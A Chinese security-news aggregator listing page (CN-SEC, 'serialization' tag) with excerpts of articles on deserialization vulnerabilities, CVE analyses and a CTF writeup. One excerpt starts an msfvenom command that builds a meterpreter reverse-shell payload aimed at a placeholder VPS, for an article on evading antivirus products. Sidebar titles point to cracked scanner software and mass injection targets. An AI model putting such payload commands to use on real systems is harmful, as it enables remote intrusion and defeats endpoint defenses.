欢迎光临!
登录
  • DNSlog
  • CN-SEC中文网·在线工具
  • 设备默认密码查询
  • 在线工具集合
  • 娱乐一下
  • 友情链接

    CN-SEC 中文网 CN-SEC 中文网

    聚合网络安全,存储安全技术文章,融合安全最新讯息

    bj
    登录
    • 首页
    • 安全新闻
    • 云安全
    • 安全博客
      • 鬼仔Blog
      • 独自等待
      • dmsec
      • Asura笔记本
      • gh0st_cn
      • javasec_cn
      • moonsec_com
      • Mr.Wu
      • 颓废's Blog
      • 漏洞时代
      • SecIN安全技术社区
    • 安全漏洞
      • 乌云漏洞
    • 安全文章
      • HW&HVV
      • 应急响应
      • 人工智能安全
    • 逆向工程
      • CTF专场
      • 移动安全
      • IoT工控物联网
    • 安全开发
      • 代码审计
    • 安全工具
    • 安全闲碎

      搜索热点

      首页序列化第 18 页
      代码审计

      代码审计-CVE-2023-6654-PHPEMS-加密-解密分析

      本文来自团队小伙伴:c3ting 博客地址 https://c3ting.com 正文: 路由: 入口方法: 鉴权分析: 由此可以得出 鉴权是由session类负责获取参数后,由各个类的魔术方法负责:...
      admin 02月03日64 views评论加密 序列化
      阅读全文
      安全百科

      一篇文章说清楚URLDNS链

      接上一篇讲到java原生的序列化和反序列化方法,这篇通过URLDNS链为例展开讲讲java原生序列化和反序列化的危害,以及通过URLDNS链的分析来简单入门反序列化漏洞的代码审计。java序列化和反序...
      admin 01月24日26 views评论反序列化 序列化
      阅读全文
      安全开发

      保障代码安全:解析Java反序列化

      免责声明本公众号着重分享技术内容,所提供信息旨在促进技术交流。对于因信息使用而引起的任何损失,本公众号及作者概不负责。请谨慎行事,安全至上。前言深入理解java反序列化漏洞并非一帆风顺的过程,因其涉及...
      admin 01月19日33 views评论反序列化 序列化
      阅读全文
      安全工具

      Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

      反序列化+远程分离免杀+反沙箱 首先也是通过 msfvenom -p windows/x64/meterpreter/reverse LHOST=你的vps地址 LPORT=4444 -f c -b ...
      admin 01月16日89 views评论shellcode 反序列化
      阅读全文
      安全开发

      【Django进阶】django-rest-framework中文文档——序列化器

      搭建环境使用django-rest-framework中文文档——快速入门中的虚拟环境。新建snippets应用程序python .manage.py startapp snippets注册相关应用程...
      admin 01月10日20 views评论rest 序列化
      阅读全文
      CTF专场

      极客大挑战JAVA题目WP

      Java该题目源码位于 https://github.com/yaklang/yaklang/tree/geek2023)  分析打开后是一个登录框。登录登录是明文传输的,可以直接从源码看密码,也可以...
      admin 01月10日26 views评论split 序列化
      阅读全文
      安全文章

      CVE-2022-1471 SnakeYAML RCE

      上周,来自 Atlassian 的一份公告,该报告修复了SnakeYAML库中的一个反序列化远程代码执行漏洞 ,编号为CVE-2022-1471。我花了一些时间看了下Confluence和Bitbuc...
      admin 01月09日322 views评论反序列化 序列化
      阅读全文
      安全文章

      西软云XMS 反序列化RCE

      漏洞详情 01 西软云XMS是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代云架构为国内四,五星级中高端酒店提供灵活、高度整合酒店业务&...
      admin 12月30日418 views评论rce 反序列化
      阅读全文
      代码审计

      一篇入门java反序列化漏洞

      一篇入门java反序列化漏洞 在探索一个技术时,我们经常会遇到众多资源和文章,但并非所有的内容都是用户友好或深入浅出的。尽管网络上关于某些主题的文章众多,但很多往往缺乏细致的解释和深入的理解。仅仅通过...
      admin 12月27日46 views评论反序列化 序列化
      阅读全文
      代码审计

      反序列化漏洞之Python篇

      关于序列化与反序列化 序列化(Serialization):这是将对象的状态转换为可以保存或传输的形式(通常是字节序列)的过程。在这个过程中,对象的公共、私有字段和其他组成部分被转换为可以存储在文件中...
      admin 12月26日46 views评论反序列化 序列化
      阅读全文
      安全文章

      .Net反序列化之Call Getter

      引言 近日,Hexacon会议上安全研究员Piotr Bazydło公布了.Net反序列化的研究,其研究内容包括SolarWinds的一系列反序列化漏洞发现和黑名单的绕过,不安全的序列化利用,.net...
      admin 12月23日30 views评论反序列化 序列化
      阅读全文
      代码审计

      【代码扫描修复】不安全的反序列化攻击

      PART.01一、漏洞描述 1.1 摘要: 在运行时对用户控制的对象流进行反序列化,会让攻击者有机会在服务器上执行任意代码、滥用应用程序逻辑和/或导致 Denial of Service。 1.2 漏...
      admin 12月21日118 views评论反序列化 序列化
      阅读全文
      64

      文章导航

      1 … 14 15 16 17 18 19 20 21 22 … 64

      最新文章

      •  【CVE-2025-4123】:Grafana SSRF 及帐户接管利用 05/24 0 views
      • 浅谈src挖掘中——文件上传和XSS漏洞的组合拳 05/24 0 views
      • 基于GRUB2的Bootkit:疑似与NSA方程式组织关联的新型恶意软件威胁 05/24 1 views
      • 锐捷EWEB任意文件读取漏洞 05/24 1 views
      • 工具 | Sirius 05/24 1 views

      大家喜欢

      • 669个大学网站都有注入点 4305/01
      • 揭秘CVE-2024-21111:Oracle VirtualBox 本地权限提升漏洞 2806/12
      • 【工具】Awvs14.7.220401065|可自测Spring4Shell漏洞 2304/03
      • 信息安全工程师教程第2版(文末附电子版下载) 1709/07
      • Cobalt Strike 4.4 (August 04, 2021)发布 1308/26
      • 正方教务管理系统最新版无条件注入&GetShell 1201/01
      • Acunetix14.x全版本通杀破解补丁 1012/17

      网站概况

      • 文章144076
      • 分类48
      • 标签154670
      • 留言708
      • 链接0
      • 浏览21918182
      • 今日50
      • 本周464
      • 运行6506 天
      • 更新2025-5-24

      关于本站

      name
      CN-SEC.COM中文网
      聚合网络安全,存储安全技术文章,融合安全最新讯息
      weixin
      文章144076 留言 708 访客21918182

      CN-SEC 中文网

      CN-SEC 中文网

      网站概况[CN-SEC 中文网]

      • 文章144076
      • 分类48
      • 标签154670
      • 留言708
      • 链接0
      • 浏览21918182
      • 今日50
      • 本周464
      • 运行3343 天
      • 更新2025-5-24
      Copyright ©  CN-SEC中文网  版权所有. CN-SEC.COM

      登录 找回密码

      输入用户名或电子邮件


      重置密码链接通过邮箱发送给您
      • 目录

      • 在线咨询

        13688888888
        QQ在线咨询

        微信

        微信
      • CN-SEC 中文网

        本页二维码